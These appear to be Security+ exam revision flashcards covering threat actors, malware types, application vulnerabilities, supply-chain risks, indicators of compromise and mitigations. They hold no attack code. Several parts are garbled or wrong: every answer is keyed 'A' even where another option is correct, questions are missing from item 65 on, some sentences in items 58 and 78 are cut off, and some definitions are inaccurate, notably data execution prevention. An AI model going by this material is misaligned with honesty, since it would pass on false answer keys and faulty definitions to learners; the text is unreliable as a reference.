Threat, Vulnerabilities and Mitigations: Quiz Revision Flashcards

Question 1

Q

Which of the following network attacks has the goal of capturing a user’s login information to use in a subsequent attack?

A) Amplified
B) Credential replay
C) On-path
D) Reflected

Answer

A

A credential replay attack uses intercepted credentials to initiate an attack. An attacker will monitor the conversation between Benjamin and George and capture the credentials of George. Later, the attacker initiates a conversation with Benjamin. When challenged for credentials by Benjamin, the attacker supplies George’s credentials, and Benjamin allows the conversation to continue.

Question 2

Q

What is a reflected attack?

Answer

A

Reflected attacks are Distributed Denial of Service (DDoS) attacks. Reflected DDoS attacks used spoofed IP addresses to send excessive traffic to targets. The attacker will make multiple requests for information from a server, using the spoofed IP address of a victim. The victim is then overwhelmed with response traffic from the server.

Question 3

Q

What is a On-Path attack?

Answer

A

An on-path (formerly known as man-in-the-middle) attack occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver. This type of attack often involves interrupting network traffic to insert malicious code.

Question 4

Q

What is a Amplified attack?

Answer

A

Amplified attacks are often part of a DDoS attack, usually associated with UDP protocols. The goal of this attack is to turn a simple query, such as DNS or NTP, into a flood of responses that overwhelms the victim’s network resources

Question 5

Q

A user notifies you that a software application displays advertisements while the application is executing. Of which security threat is this an example?

A) spyware
B) virus
C) worm
D) adware

Answer

A

Adware is a software application that displays advertisements while the application is executing. A common example is a free mobile app that displays advertisements for other products at the bottom of the screen. Some adware is also spyware that monitors your Internet usage and personal information. Some adware will even allow credit card information theft. The application’s developer may or may not be aware that malicious ads containing spyware are being displayed through the application.

A worm is a program that spreads itself through network connections. Spyware often uses tracking cookies to collect and report on a user’s activities. Not all spyware is adware, and not all adware is spyware. The definition of spyware requires that your activities be monitored and tracked; the definition of adware requires that advertisements be displayed.

A virus is malicious software (malware) that relies upon other application programs to execute itself and infect a system. Another malware that you need to be familiar with is ransomware, which restricts access to a computer that it infects. The ransomware then demands a ransom paid to the creator of the malware for the restriction to be removed.

Question 6

Q

Which threat actor motivation is exemplified by threatening to release sensitive personally identifiable information (PII)?

A) Financial gain
B) Service disruption
C) Blackmail
D) Data exfiltration

Answer

A

Blackmail is most commonly accomplished by threatening to release sensitive PII or incriminating evidence regarding an individual. The cyber-criminal targets an individual who has access to certain company assets, such as data, systems, or processes, and then digs into their personal records. The cyber-criminal threatens to expose the individual unless they take some action against a company asset on the criminal’s behalf.

Remember that not all PII is sensitive. While names, addresses, gender, and dates of birth are PII, they are found in many public databases. PII also includes geo-location data, online browsing history, and medical records, which are more likely to be leveraged by a blackmailer.

Question 7

Q

What is service disruption?

Answer

A

Service disruption can cause damage to an organization’s reputation, or loss of public confidence in the organization. If an airline had a disruption where you could not access their services, such as booking a flight, that person would likely do business with another airline.

Question 8

Q

What is Data exfiltration?

Answer

A

Data exfiltration is the act of sending sensitive or proprietary information to unauthorized recipients external to the organization. Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event. When it occurs, the best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action against the user.

Question 9

Q

What is financial gain motivation?

Answer

A

Financial gain motivation is exemplified by activities such as fraud, ransom attacks, and theft of credit card data. Once the threat actor has your information, they can sell it or use it for fraudulent purposes. When a cyber-criminal threatens to reveal sensitive PII in exchange for money, it is termed extortion, not blackmail.

Question 10

Q

What is Espionage?

Answer

A

Espionage – Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

Question 11

Q

What is Philosophical or political beliefs?

Answer

A

Philosophical or political beliefs – Philosophical beliefs and political beliefs are used by extremist groups to recruit members to their cause. One nation might attempt to convince citizens of another nation to perform cyberterrorist activities. Hacktivists are the typical actor here.

Question 12

Q

What are ethical motives?

Answer

A

Ethical motives – Ethical hackers (sometimes called white-hat hackers or penetration testers) are individuals hired by the company to test the company’s security infrastructure. Their purpose is to conduct activities to find weaknesses and “break in”. The ethical hacker will prepare a report detailing the weaknesses so that the client company can address those issues and make corrections. They may be mistaken for threat actors by the company’s in-house team during a closed penetration test.

Question 13

Q

What is revenge motivation?

Answer

A

Revenge – threat actors can be motivated by revenge. Revenge and retaliation result from the perception that the threat actor has been slighted by a person or organization. The threat actor wants to “teach them a lesson” or extract revenge.

Question 14

Q

What is disruption and Chaos?

Answer

A

Disruption/Chaos – Some threat actors simply want to cause disruption and chaos. A threat actor might be motivated to gain notoriety by claiming responsibility for a disruptive event. The end goal is to upset normal operations in an attention-getting way.

Question 15

Q

What is War motivations?

Answer

A

War – Civilians and nation-states can use cyberspace to advance wartime agendas. Each may be engaged in activities that disrupt a target’s communications, services, and infrastructure, or to spread propaganda, misinformation, and fear.

Question 16

Q

Which of the following supply chain elements are threat vectors? (Choose all that apply.)

A) Third-party software dependencies
B) Managed service providers
C) Hardware suppliers
D) Software suppliers

Answer

A

Managed service providers (MSPs), software and hardware suppliers, and third-party software dependencies are all threat vectors in the supply chain. A supply-chain attack is not an attack on a target directly, but on a more vulnerable company or resource that helps the target organization conduct its business or create a product. By infiltrating the target’s supply chain, the attackers can gain access to internal systems or data through the compromised components.

Managed Service Providers (MSPs) are highly susceptible to supply chain attacks. MSPs provide IT services to other organizations, and may have access to data from their clients. When an organization announces that they are outsourcing a certain aspect of their business, they are outsourcing to an MSP. An MSP may provide any combination of a number of services, such as help desk services, tech support, software updates, data backup, and even payroll services. When an attacker targets an MSP, they potentially have access to multiple clients of that MSP. The most well-known supply chain attack involving an MSP was the SolarWinds attack of 2020. Attackers may also disable access to a third-party managed service, as in the United Healthcare billing service attack of 2024.

Software suppliers include cloud-based SaaS providers and application vendors. Software provider vulnerabilities occur in third-party companies that provide software to other companies (customers). Attackers will look for a vulnerability within the software that the attacker can exploit. Then, when the customer installs the software, the customer’s data is exposed to the attacker, or the attacker is able to install more malicious software into the customer’s system to establish a foothold.

Third-party software dependencies refer to the external libraries, frameworks or components that integrate with an organization’s existing software or that were used to build third-party software. These external items add functionality, or perhaps assist with further development. Issues to consider with third-party software include the possibility of malicious components, lack of transparency from the vendor, and supply chain attacks on vulnerable components.

Question 17

Q

What are some the strict Audit controls to avoid supply chain attacks?

Answer

A

All vendors in the supply chain should be under strict audit controls. Some recommended best practices to mitigate supply-chain attacks include:

Monitor third-party service providers’ access to sensitive data.

Make an inventory of all data exposed to the supply chain.

Request source code and list of all components used to build a vendor’s software.

Include security requirements and a right-to-audit in all contracts with managed service providers, software providers, and hardware suppliers.

Use automated supply-chain management tools to continually monitor for and remediate known vulnerabilities and audit behavior.

Have a formal procedure for offboarding old vendors and removing their access to internal systems.

Question 18

Q

What are some of the hardware supply chain attacks?

Answer

A

Hardware provider vulnerabilities occur in device manufacturers and suppliers. A classic example is the Target breach in 2013. Target’s HVAC hardware provider was compromised, and through the HVAC provider, attackers accessed Target’s payment system and stole millions of credit card numbers from Target’s customers. Other hardware-based supply chain attacks could include:

Selling counterfeit equipment through an unauthorized channel
Tampering with legitimate equipment before it is delivered to the target

Using uncertified third-party components while manufacturing the hardware

Allowing off-site personnel to install hardware without supervision
To mitigate these risks, organizations should only buy hardware from authorized resellers or the manufacturer, inspect hardware for signs of tampering, supervise vendor personnel during equipment installation, and request vendors certify the hardware and its components.

Question 19

Q

Which of the following malware attacks is actually a collection of unwanted or unnecessary programs installed on a system?

A) Keylogger
B) Bloatware
C) Rootkit
D) Trojan

Answer

A

Bloatware is an umbrella term for all the extra (and usually unwanted) applications that are installed on systems by the manufacturers. Many of these extra applications are harmless, and some of these applications may be bundled in a zip file. When you install from the zip file, you also install all the extra applications which may include things like browser hijackers, adware and even spyware.

Question 20

Q

What is a keylogger?

Answer

A

Keyloggers capture the keystrokes made on the keyboard and send them to the attacker. The keylogger can be a physical device, it is more often a software application. The keylogger records the keystrokes made by the users as a file, which can be transmitted in real time or at a time of the attacker’s choosing.

Question 21

Q

What is a Trojan?

Answer

A

A Trojan is malware, malicious content that looks to be something beneficial or legitimate. The user is tricked into downloading and installing the content, or clicking on a link that is actually an executable. The name “Trojan” comes from the ancient Greek story of the Trojan Horse.

Question 22

Q

What is a rootkit?

Answer

A

A rootkit is a type of malware that allows attackers to have administrative access through a backdoor. Once an attacker has gained access, the rootkit may have the capability of erasing its tracks. Rootkits are particularly dangerous, since the administrative access allows the attacker to change system-level files including the Registry.

Question 23

Q

You have several independent security monitoring solutions, each with different logging mechanisms. You are concerned that they are not working well together, and that the separate logs may not present all the necessary information. In addition, the costs of maintaining the separate products are rising. You need to provide a centralized solution that will include centralized logging. What could you replace them with?

A) Patch management tools
B) Host-based firewall
C) DLP
D) UTM

Answer

A

Unified Threat Management (UTM) incorporates several threat management devices and systems into one appliance. The biggest advantage to a UTM from an analysis standpoint is that all the logs are in one place, as opposed to checking multiple systems. In addition, a UTM would cut down on the costs associated with maintaining separate products.

Question 24

Q

What are HIPS and HIDS used for?

Answer

A

HIDSs and HIPSs have two different functions. Host-based Intrusion Detection Systems (HIDS) will provide an alert in the event of a breach on a single server or computer. Host-based Intrusion prevention systems (HIPS) will go a step further and stop the attack. An example would be shutting down port 80 when http traffic exceeds the baseline norm. With either product, it would be important to view the log entries generated, and interpret the results based on documentation provided by the HIPS/HIDS vendor. A host-based system will not monitor network traffic for threats.

Question 25

Q

Is Antivirus products a one stop shop against threat?

Answer

A

Antivirus products (and the antimalware products that encompass them) provide notifications when a threat has been detected, and what action was taken. On many occasions, the software will identify a potential threat, and prompt you for what action to take. Antivirus is not a centralized solution for security; it is only one part of the solution.

Question 26

Q

What does Patch Management tool assist in?

Answer

A

Patch management tools assist with the installation of patches, which can present a significant challenge to an enterprise environment. Their logs will contain successful and failed updates, incompatible patches, and unsuccessful patch installations, but no other security logging information.

Question 27

Q

What are the features of Host-Based firewalls?

Answer

A

Host-based firewalls include products that are installed as an application, or included in the OS, such as the Windows Firewall. In the case of Windows Firewall, it is possible to have the firewall activated, but not generating log entries. You can activate logging by going into the console, choosing Actions, then Properties. The logging can be set as seen below. It is important to review the documentation that accompanies the application to interpret the results. Firewall logs display traffic that has been allowed and denied passage through the firewall, but not logs from other security systems, such as antimalware tools.

Question 28

Q

What are the security technologies and their output?

Answer

A

For the Security+ exam, you also need to understand other security technologies and their output, including file integrity checks, application allow listing, removable media control, DEP, WAFs, DLP, UTM, and advanced malware tools.

Question 29

Q

What is a File integrity checks do?

Answer

A

File integrity checks examine selected files to see if there have been any changes, or attempted changes. It is important to review the logs to know when attempts have been made, even if the file integrity product returned the file to the original state.

Question 30

Q

What are the functions of Application allow list?

Answer

A

Application allow list is the practice of denying all applications except for those that are approved. Those approved applications are designated as on the allow list. Several products are available that check for applications that are not on the allow list, including attempts to install those applications. The logs the allow list product generates would tell you if someone had attempted (for example) to install a keylogger. Removable media control (RMC) is important in many environments. USB drives, SD cards, CDs, DVDs and BluRay devices can all present dangers to the system. As an example, someone can use a USB drive to copy sensitive information and deliver it to someone outside the organization. Another example could be a CD that appears to be a music CD but is actually installation media for unauthorized software. Examine the RMC logs to determine attempts to violate removable media policies.

Question 31

Q

Why are advanced malware tools check do?

Answer

A

Advanced malware tools check for malicious code that would otherwise slip by standard antivirus and antimalware tools.

Question 32

Q

What does DLP examine?

Answer

A

Data Loss Prevention (DLP) examines outbound traffic for sensitive data, keywords, and specific files leaving the organization.

Question 33

Q

What does DEP do?

Answer

A

Data execution prevention (DEP) forces the user to approve an application before it executes or launches. Logs will record execution attempts, including failed attempts. Notification of failed attempts is important, as it could tell you that your antimalware application successfully blocked an attempt to install malware.

Question 34

Q

What is a web application firewall?

Answer

A

A web application firewall uses a set of defined rules to manage incoming and outgoing web server traffic, as well as attack prevention. Organizations can define their own rules, based on their particular vulnerability.

Question 35

Q

Recently, while reviewing log data, you discover that a hacker has used a design flaw in an application to obtain unauthorized access to the application. Which type of attack has occurred?

A) backdoor
B) privilege escalation
C) maintenance hook
D) buffer overflow

Answer

A

An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. Privilege escalation includes incidents where a user logs in with valid credentials and then takes over the privileges of another user, or where a user logs in with a standard account and uses a system flaw to obtain administrative privileges.

There are two types of privilege escalation: vertical and horizontal. With vertical privilege escalation, the attacker obtains higher privileges by performing operations that allow the attacker to run unauthorized code. With horizontal privilege escalation, the attacker obtains the same level of permissions as he already has but uses a different user account to do so.

Question 36

Q

What does the term backdoor mean?

Answer

A

A backdoor is a term for lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms. Backdoors are also referred to as maintenance hooks.

Question 37

Q

What does a buffer overflow involved in?

Answer

A

A buffer overflow occurs when an application erroneously allows an invalid amount of input in the buffer. It can be used to perform a denial-of-service (DoS) attack or a Distributed Denial-of-Service (DDoS) attack.

Question 38

Q

What is a race condition in Application issue?

Answer

A

Race condition – typically targets timing, mainly the delay between time of check (TOC) and time of use (TOU). To eliminate race conditions, application developers should create code that processes exclusive-lock resources in a certain sequence and unlocks them in reverse order.

Question 39

Q

What is insecure direct object references in application issues?

Answer

A

Insecure direct object references – occurs when a developer exposes a reference to an internal object, such as a file, directory, database record, or key, as a URL or form parameter without implementing the appropriate security control. An attacker can manipulate direct object references to access other objects without authorization. Implementing an access control check helps to protect against these attacks.

Question 40

Q

What does CSRF do in terms of application issues?

Answer

A

Cross-site request forgery (CSRF) – occurs when a malicious site executes unauthorized commands from a user on a web site that trusts the user. It is also referred to as a one-click attack or session riding. Implementing anti-forgery tokens protect against this attack.

Question 41

Q

What application issue occurs when improper storage of sensitive data occurs?

Answer

A

Improper storage of sensitive data – occurs when sensitive data is not properly secured when it is stored. Sensitive data should be encrypted and protected with the appropriate access control list. Also, when sensitive data is in memory, it should be locked.

Question 42

Q

When does improper error and exception handling occurs in application issues?

Answer

A

Improper error and exception handling – occurs when developers do not design appropriate error or exception messages in an application. The most common problem because of this issue is the fail-open security check, which occurs when access is granted (instead of denied) by default. Other issues include system crashes and resource consumption. Error handling mechanisms should be properly designed, implemented, and logged for future reference and troubleshooting.

Question 43

Q

Why is Secure cookie storage transmission so important to avoid application issues?

Answer

A

Secure cookie storage and transmission – Cookies store a user’s web site data, often including confidential data, such as usernames, passwords, and financial information. A secure cookie has the secure attribute enabled and is only used via HTTPS, ensuring that the cookie is always encrypted during transmission.

Question 44

Q

What are memory leaks when it comes to application issues?

Answer

A

Memory leaks – occur when an application does not release memory after it is finished working with it. Reviewing coding and designing best practices helps to prevent memory leaks.

Question 45

Q

Application Issue: Integra Overflow?

Answer

A

Integer overflows – occurs when an operation attempts to input an integer that is too large for the register or variable. The best solution is to use a safe integer class that has been built to avoid these problems.

Question 46

Q

Application Issue: Geo-Tagging?

Answer

A

Geo-tagging – occurs when media, such as photos or videos, are tagged with geographical information. Turning off the geo-tagging feature on your device protects against releasing this type of information. It is also possible to remove geo-tagging information from media before using it in an application or web site.

Question 47

Q

Application issue: Data Remnants?

Answer

A

Data remnants – occurs when applications are removed but data remnants, including registry entries, are left behind. Specialty tools and apps are available to ensure that applications have been completely removed from a device.

Question 48

Q

You have recently been hired as a network administrator. The CIO informs you that their wireless networks are protected using firewalls. He has asked that you implement MAC filtering on all access points. What is the purpose of using this technology?

A) to provide port authentication for a wireless network
B) to ensure that unused ports are not accessible by clients
C) to restrict the clients that can access a Web site
D) to restrict the clients that can access a wireless network

Answer

A

The purpose of MAC filtering is to restrict the clients that can access a wireless network. Access is restricted based on the client’s media access control (MAC) address, which is the unique identifier that is encoded on the network interface card (NIC).MAC filtering is not used to restrict the clients that can access a Web site. This is most often done using access control lists (ACLs).

802.1X (or WPA2-Enterprise) provides port authentication for a wireless network using Extensible Authentication protocol (EAP). 802.1X can use Protected EAP (PEAP) or Lightweight EAP (LEAP). PEAP is the more secure of the two. Both of these implementations require a server certificate on the RADIUS server. If the RADIUS server certificate expires, then clients will be unable to connect until the RADIUS server obtains a new certificate.

To ensure that unused ports are not accessible by clients, you should disable all unused ports.

Question 49

Q

How to increase network security in wireless network?

Answer

A

To increase network security, you should use the following mitigation and deterrent techniques:

MAC limiting and filtering
802.1X
Disable unused interfaces, applications, and services.
Rogue machine detection

You should always monitor system logs, including the audit logs, event logs, security logs, and access logs. Often by monitoring these logs, a security professional can discover issues or attacks and can take measures to prevent the issues.

Security professionals should understand an organization’s security posture. Security professionals should perform certain mitigation and deterrent activities including recording an initial baseline configuration, continually monitoring security, and performing remediation as necessary.

You should also ensure that a good reporting system is set up to notify appropriate personnel if certain actions occur. This reporting system should include alarms and alerts. Security professionals should also perform periodic trending analysis to identify any new organizational trends.

Mitigation controls help to mitigate security issues. Deterrent controls help to deter attacks. Prevention controls help to prevent attacks. Detective controls help to detect any attack when it occurs. Any security policy should employ all of these types of controls to be most effective. Cameras and intrusion detection systems (IDSs) are detective controls. Intrusion prevention systems (IPSs) and guards are preventive controls.

Question 50

Q

A remote employee has a history of logging into the system every day between 8:50 AM and 9:05 AM. Today, the employee logs in at 3 AM. What does this exemplify?

A) Out-of-cycle logging
B) Resource inaccessibility
C) Published/documented
D) Missing logs

Answer

A

Out-of-cycle logging is when an event that normally occurs and is recorded at a regular time or interval shows up in the log as having occurred at an odd time or off-cycle. While it’s normal to see the event, it appears at a strange time, signaling that an attack may be underway.

Question 51

Q

What are the signs of Resource inaccessibility?

Answer

A

Resource inaccessibility is an indicator of malicious activity. For example, if a web server goes down and is suddenly inaccessible, it might be the victim of a Denial of Service (DoS) attack.

Question 52

Q

What happens when published/documented indicators are used?

Answer

A

Published/documented indicators are those that have been recently discovered and subsequently published by threat feed organizations such as the Cybersecurity and Infrastructure Security Agency (CISA). These indicators may include things like IP addresses, file hashes like MD5, and domain names. By knowing what to look for, this information can be used to uncover and respond to attacks.

Question 53

Q

What are missing logs may be signs of?

Answer

A

Missing logs may be a sign that an attack has been attempted or has occurred, and the attacker has erased the log to cover up their tracks. Log files are a critical tool in monitoring activities, investigating problems, storing information about the health of the system and the network. Consequently, many organizations will store the log files on a separate device or server in a protected area of the network.

Question 54

Q

Which of the following mitigation techniques would include establishing, deploying, and then maintaining a standard configuration, such as an image?

A) Removal of unnecessary software
B) Decommissioning
C) Installation of endpoint protection
D) Configuration enforcement

Answer

A

Configuration enforcement includes establishing, deploying, and then maintaining a standard configuration, such as a naming convention or even a system image. You could have an image based on a device/OS pair, an image for each of several user groups, or images for departments throughout the organization. Once the proper configuration has been established and preserved as a system image, configuration enforcement looks for changes to that configuration and, in some cases, even reverts the system to the proper configuration.

Question 55

Q

What is decommissioning so important?

Answer

A

Decommissioning is a mitigation technique that is used when a system or device is no longer of use to the organization. Contrary to what many users feel as adequate, deleting files into the recycle bin is not a secure process. When a system or device has reached the end of its service life, storage media and drives must be sanitized, either through destruction or using tools to erase all traces of data on the device. Such as degaussing

Question 56

Q

What is the removal of unnecessary software associated with?

Answer

A

Removal of unnecessary software is associated with system hardening. System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Other examples of system hardening activities include closing down ports and adjusting permissions.

Question 57

Q

What does endpoint security involve?

Answer

A

Endpoint security is the practice of protecting the endpoints (workstations, printers, etc.) in the network. Endpoint protection includes protecting them from other endpoints that spend at least some of the time outside the LAN. This is done by verifying patches and updates before the device is allowed access to the network. Endpoint security also includes the hardening process of endpoints. It cannot route traffic from a device being flooded to a location where the traffic can be studied

Question 58

Q

Which of the following is not a vulnerability associated with the supply chain?

A) Service provider
B) TPM
C) Software provider
D) Hardware provider

Answer

A

Trusted Platform Module (TPM) is not a supply chain vulnerability. TPM and Hardware Security Module (HSM) are both chips that implement hardware-based encryption. The main difference between the two is that a TPM chip is usually mounted on the motherboard and HSM chips are PCI adapter cards.

Supply chain vulnerabilities include the service provider, the hardware provider, and the software provider.

Hardware provider vulnerabilities occur in device manufacturers and suppliers. A classic example is the Target breach in 2013. Target’s HVAC hardware provider was compromised, and through the HVAC provider, attackers accessed Target’s payment system and stole millions of credit card numbers from Target’s customers.

Software provider vulnerabilities occur in third-party companies that provide software to other companies (customers). Attackers will look for a vulnerability within the software that the attacker can exploit. Then, when the customer installs the software, the customer

Service provider vulnerabilities can occur with a company that provides you with services, such as when you outsource your payroll processing or billing. If the service provider is compromised, the attacker can access and exploit the customer data.

Question 59

Q

Which threat actor type can be characterized by an unsophisticated skill level, the use of widely available tools, and is motivated by the need to prove their skills?

A) Hacktivist
B) Shadow IT
C) Insider
D) Unskilled attacker
E) Competitor

Answer

A

Unskilled attackers (sometimes referred to as script kiddies) typically rely on tools that are widely available on the Internet. These unskilled attackers are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, they have limited time and financial resources.

Question 60

Q

What is Shadow IT?

Answer

A

Shadow IT are IT applications, systems, and resources (such as cloud services) that are installed or used by internal staff without the knowledge or consent of the IT department. Shadow IT is neither authorized nor approved, and therefore poses a risk to the organization’s security posture, risk management, data integrity, and regulatory compliance.

Question 61

Q

What is Hacktivist?

Answer

A

Hacktivists are activists who use hacking techniques to promote their own political or social agenda. Their activities can cause DoS and DDoS attacks, or place embarrassing posts on the web sites or social media sites of an organization with opposing views. They often believe they are engaging in a righteous and morally correct cause, even if their activities are illegal. As with unskilled attackers, hacktivists often have limited time and financial resources. However, a hacktivist within a sophisticated or large organization may have access to significant resources.

Question 62

Q

What are insider attacks?

Answer

A

Insider attacks are perpetrated by people within the organization. Insider threats have many possible motives, including promotion of an activist agenda, monetary reward, retaliation for not being selected for a promotion, or some other situation that caused the insider to become disgruntled with the organization. They typically have limited resources but given that they may already have substantial knowledge of the organization and network, they are particularly dangerous.

Question 63

Q

What is Competition Attacks?

Answer

A

Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

Question 64

Q

What are Organized Crime Attacks?

Answer

A

Organized crime attacks are carried out by criminal groups for the sole purpose of monetary gain. Organizations like the Mafia, Russian organized crime, and drug cartels have significant resources in terms of time and money to recruit hackers to carry out their agenda.

Answer 65

A

Nation-state / Advanced Persistent Threat (APT) attacks are conducted by one nation upon another or upon a significant entity within the target country with large coordinated attacks. APTs have attackers who have very significant time and financial resources. Motives could be financial, political, disruption of the economy, or theft of intellectual property, such as military secrets.

Answer 66

A

Malicious update is when an attacker first creates a fake software update, containing malware, that appears to be legitimate, and then gets users to download and install the update. Upon installation, the malware is activated on the system.

Answer 67

A

Memory injection is the primary goal of buffer overflow attacks. Buffer overflows attempt to put more information than can fit into an allocated area of memory. With memory injection, the attacker inserts malicious code into program memory. The computer then executes that malicious code as part of the program.

Answer 68

A

An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.

Answer 69

A

A cross-site scripting (XSS) attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious code into a web application. A persistent XSS attack occurs when data provided to the web application is first stored persistently on the server and later displayed to users without being encoded using HTML on the web client. A non-persistent XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate results for that user. XSS flaws occur every time an application takes user-supplied data and sends it to a web browser without first confirming or encoding the data.

Answer 70

A

Cloud access security brokers would alleviate your concern because they enforce security policies, whether on-premises or cloud-based. They often sit between the cloud service users and providers, merging the security policies of the user and the provider. Virtual desktop infrastructure (VDI) creates a user desktop on a virtual machine that is hosted on a data center server. Desktops can be personalized while still having centralized management and security.

Answer 71

A

The virtual desktop environment (VDE) maintains everything related to the user desktop and deploys them to the host. Virtual desktop infrastructure can make your desktops either more secure or less so. Storing data on VDI servers in the data center is more secure than storing it locally on the user’s machine. Also, administrators have greater control over desktop and app distribution in a VDI environment. VM escape protection can be accomplished by sandboxing. If the virtual application crashes, sandboxing allows you to contain the data and not allow the information to “escape” into another application. VM escape occurs when a vulnerability in the operating system running in the virtual machine is exploited. When this occurs, it allows an attacker to run malicious code and escape the boundaries of the VM.

Answer 72

A

Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic would identify how the system will respond to the stress. Stress testing does not reveal security weaknesses between the interactions of your security policies with those of the hosting provider.

Answer 73

A

Choosing between an on-premises solution versus a hosted solution versus a cloud solution are all virtualization decisions. On-premises virtual machines (VMs) are stored at your physical location. The hosted model allows you to contract with a third party for virtual access, and the responsibilities of the third party are detailed in a service level agreement (SLA). Cloud systems, while closely related to hosted models, have requirements such as on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service, as defined by NIST.

Answer 74

A

Geotagging is the process of attaching location information in the form of geographical metadata to digital media like web sites, videos, and photographs. Geotagging is a security concern because it can reveal location information. This feature embeds unseen code into a picture that records the longitude/latitude information of where the picture was taken. Geotags may also be applied to digital output and communications such as tweets or status updates on social media.

The information included in a geotag may include place coordinates (latitude and longitude), bearings, altitude, distances, or even place names. This feature becomes a serious concern when it comes to protecting your privacy and data. Geotagging can give enough information about your current whereabouts (and where you’re not) which can allow thieves to target your home or workplace in your absence.

Answer 75

A

When considering applications that can be installed on mobile devices, you need to understand the following concepts for the Security+ exam:

Key management – You should take measures to ensure that all keys are protected. Measures that you can use include implementing device encryption to protect the keys while stored and using IPSec to protect the keys during transmission.
Credential management – You should implement solutions that allow you to manage credentials for users to ensure that mobile devices are only accessed by valid users. In addition, you should ensure that the protocols that you use do not transmit credential information in plaintext.

Authentication – If possible, you should require your mobile applications to authenticate users before allowing access. This ensures that applications are only accessed by valid users.
Encryption – Applications often request personally identifiable information (PII) that should be protected. In addition, they often transmit PII and other confidential information. Therefore, you should employ encryption to protect the data in storage and in transmission.

Transitive trust/authentication – Transitive trust occurs when federated user identities allow users to access multiple applications, devices, and resources using a single authentication. A trusted computing base is established as the basis of federated user identity. Enterprises should ensure that any entities allowed into the trusted computing base are fully protected.

When deploying mobile devices securely, security professionals need to set policies and enforce them through monitoring all of the following features or practices: Third-party app stores, rooting/jailbreaking, sideloading, custom firmware, carrier unlocking, firmware over-the-air (OTA) updates, camera use, SMS/MMS, external media, USB on-the-go (OTG), recording microphones, GPS tagging, Wi-Fi direct/ad hoc, tethering, and payment methods. Management should set the policy for each of these mobile device components. Policies are only effective if a plan for enforcement and monitoring is also established.

Answer 76

A

The malware types should be matched with the descriptions in the following manner:

Backdoor – a developer hook in a system or application that allows developers to circumvent normal authentication

Logic bomb – a program that executes when a certain predefined event occurs

Spyware – a program that monitors and tracks user activities

Trojan horse – a program that infects a system under the guise of another legitimate program

Answer 77

A

NIST defines cybersecurity risks throughout the supply chain as “the potential for harm or compromise that may arise from suppliers, their supply chains, their products, or their services” (NIST SP 800-161r1). Among the recommended techniques for minimizing adversarial threats from hardware purchases, you should:

Only purchase hardware from authorized vendors or resellers

Integrate supply chain management into the overall risk management framework

Inspect hardware for signs of tampering

Request proof of equipment certification from hardware vendors
Conduct a supply chain analysis and audit the existing supply chain
Have an inventory management system that includes asset tracking and secure disposal

Natural disasters are a threat to the supply chain, but they are not an adversarial threat. Adversarial threats arise from a human vector, such as malicious insiders, organized crime, and nation-states.

A legally enforceable purchase order with a hardware vendor will not protect your organization from hardware that has been tampered with once it left the vendor’s direct control. Hardware should be inspected for missing or broken seals, opened boxes, refurbished components, or counterfeit components.

Answer 78

A

Impossible travel is when a user logs in from one location, and then moments later logs in from another location, but it would have been impossible for the user to have traveled between the two locations in that time frame. An example would be a user who logs on in New York, then 20 seconds later the same user logs on in Tokyo.

Blocked content can be an IoC. If, for example, a filter on a firewall could result from a filter on a firewall finding malicious code, or it could be

Resource consumption occurs with events like filling all the space on a drive or using all the bandwidth on a network.

Answer 79

A

Concurrent session usage happens when you have two or more instances of a user account logged in at the same time, when there should be only one instance of that user login. This could happen with the same system or different systems. The key factor here is that it would be unexpected for the user to login multiple times. A user with a Gmail account open on several devices simultaneously would not be a concurrent session usage IoC.

Answer 80

A

Your organization experienced a cross-site scripting (XSS) attack. An XSS attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious code into a web application. A persistent XSS attack occurs when data provided to the web application is first stored persistently on the server and later displayed to users without being encoded using HTML on the web client. A non-persistent XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate results for that user. XSS flaws occur every time an application takes user-supplied data and sends it to a web browser without first confirming or encoding the data.

To locate XSS attacks, you should look for lines in the web server log that contain JavaScript or other scripting languages that forward a user’s session cookie to an external location or web page.

Answer 81

A

A buffer overflow occurs when an invalid amount of input is written to the buffer area.

Answer 82

A

A SQL injection occurs when an attacker inputs actual database commands into the database input fields instead of the valid input. You should include input validation to prevent SQL injection attacks.

Answer 83

A

Path traversal occurs when the ../ characters are entered into the URL to traverse directories that are not supposed to be available from the web.

Answer 84

A

Some possible countermeasures to input validation attacks include the following:

Filter out all known malicious requests.
Validate all information coming from the client, both at the client level and at the server level.
Implement a security policy that includes parameter checking in all web applications.

Answer 85

A

Another application issue that you need to understand is click-jacking. Click-jacking is a technique that is used to trick users into revealing confidential information or taking over the user’s computer when clicking links.

Answer 86

A

Often you will need to determine the attack vector used. Reverse engineering is the best way to do this.

Answer 87

A

When designing a web application, security should be one of the facets that you should always keep in mind. An application should be secure by design, by default, and by deployment. Secure by design means that the application is designed with security in mind. Secure by default means that the application defaults to being secure without changing application settings. Secure by deployment means that the environment into which the application is deployed is taken into consideration from a security standpoint.

Answer 88

A

You also need to understand exploits that will cause security issues with identity and access management:

Impersonation – Attackers may try to impersonate a legitimate user to obtain access credentials. Identity proofing is mitigation for this type of attack.

Man-in-the-middle (MITM) – This attack occurs when an attacker intercepts messages between two devices and eavesdrops on the communication. The attacker attempts to impersonate each party. Using one-time-passwords and mutual authentication are mitigations for this attack.

